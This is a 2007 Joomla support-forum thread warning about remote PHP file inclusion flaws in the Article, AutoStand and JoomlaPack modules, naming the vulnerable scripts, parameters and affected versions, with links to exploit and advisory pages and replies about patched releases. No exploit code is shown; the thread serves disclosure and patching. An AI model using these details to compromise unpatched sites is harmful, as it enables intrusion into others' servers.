WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

For all Non-Joomla! security issues. ie 3pd Components etc.

Moderator: General Support Moderators

Forum rules
Locked
armybot
Joomla! Apprentice
Joomla! Apprentice
Posts: 28
Joined: Fri Jun 09, 2006 7:58 am

WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by armybot » Tue Apr 17, 2007 5:18 am

ARTICLE
A vulnerability has been identified in Article (module for Joomla), which could be exploited by remote attackers to execute arbitrary commands. This issue is caused by input validation errors in the "components/com_articles.php" and "classes/html/com_articles.php" scripts when processing the "absolute_path" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.

Affected Products

Article (module for Joomla) version 1.1 and prior

See:
http://www.milw0rm.com/exploits/3736
http://www.frsirt.com/english/advisories/2007/1394


AUTOSTAND
A vulnerability has been identified in AutoStand (module for Joomla), which could be exploited by remote attackers to execute arbitrary commands. This issue is caused by an input validation error in the "mod_as_category.php" script that does not validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.

Affected Products

AutoStand (module for Joomla) version 1.1 and prior


See:
http://www.milw0rm.com/exploits/3734
http://www.frsirt.com/english/advisories/2007/1392


JoomlaPack for Joomla "mosConfig_absolute_path" PHP File Inclusion Vulnerability

A vulnerability has been identified in JoomlaPack (module for Joomla), which could be exploited by remote attackers to execute arbitrary commands. This issue is caused by an input validation error in the "includes/CAltInstaller.php" script when processing the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.

Affected Products

JoomlaPack (module for Joomla) version 1.0.4a2 RE and prior

NOTE: 1.0.4.a3 is OUT and doesn't seem to have any problem at all (contacting the author about it).

Info:
http://www.frsirt.com/english/advisories/2007/1429


I could be useful to update 3rd party vulnerability list.

Take care,

ArMyBoT
Last edited by armybot on Wed Apr 18, 2007 9:26 am, edited 1 time in total.

nunomsh
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Sat Feb 17, 2007 6:26 pm
Contact:

Re: WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by nunomsh » Wed May 02, 2007 10:35 pm

Security updated! Thanks for the info. Version 2.0 fixes the missing defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

thinkart
Joomla! Apprentice
Joomla! Apprentice
Posts: 18
Joined: Fri Jan 12, 2007 11:01 am
Contact:

Re: WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by thinkart » Fri May 04, 2007 10:47 pm

nunomsh wrote: Security updated! Thanks for the info. Version 2.0 fixes the missing defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
So where can the version 2 be downloaded? JoomlaPack seems to have disappeared from the "extensions".
And what should I do when I was using 1.0.3 and backed-up some sites? Can I expect that one day all my sites on a server are gone? Anything out there to prevent this? Any help appreciated!
Last edited by thinkart on Fri May 04, 2007 10:50 pm, edited 1 time in total.

nunomsh
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Sat Feb 17, 2007 6:26 pm
Contact:

Re: WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by nunomsh » Sat May 05, 2007 2:03 am

I can only speak for autostand, and the module you can download it at http://www.webstylecreations.com or insert the parameter in the file, but since some changes where made better to replace the file.
About the security,  upload this file to root and run it. This will do a check up in all the files if the code as the parameter.
Can I expect that one day all my sites on a server are gone? Anything out there to prevent this?


Nobody can give you 100% certain that it will never happen, but it's in our best interest to made the extentions better and secure, but sometimes we miss something... :-\
You do not have the required permissions to view the files attached to this post.

rlehman
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Fri Dec 01, 2006 1:28 am

Re: WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by rlehman » Sat May 12, 2007 8:01 pm

I have read that there is supposed to be a newer release of JoomlaPack that corrects the security vulnerability. Can anyone tell all of us where to go to download the newest release? I have looked on Joomla.org, Google, etc. but cannot find anywhere. It is as if the developer of this component has fallen off the face of the earth  ???

User avatar
schipperijn
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 110
Joined: Thu Apr 06, 2006 3:42 pm
Location: Leeuwarden
Contact:

Re: WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by schipperijn » Sat May 12, 2007 9:22 pm

Yes That would be great. The only good backup system I loved was this Joomlapack  :-*.
The ajax in it makes it possible for large sites to not have a timeout at database/scripts.
Its simple and fast for small sites. Making a mistake is almost not possible. Download is simple.

I will mail [email protected] and see what has happen and what is the planning  :pop

User avatar
tortureduck
Joomla! Apprentice
Joomla! Apprentice
Posts: 22
Joined: Sat Sep 17, 2005 9:14 am

Re: WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by tortureduck » Sat May 19, 2007 7:27 am

The homepage is: http://sledge81.freehostia.com/

He adresses the security-bug in this article: http://sledge81.freehostia.com/index.ph ... 0&Itemid=1


Locked

Return to “3rd Party/Non Joomla! Security Issues”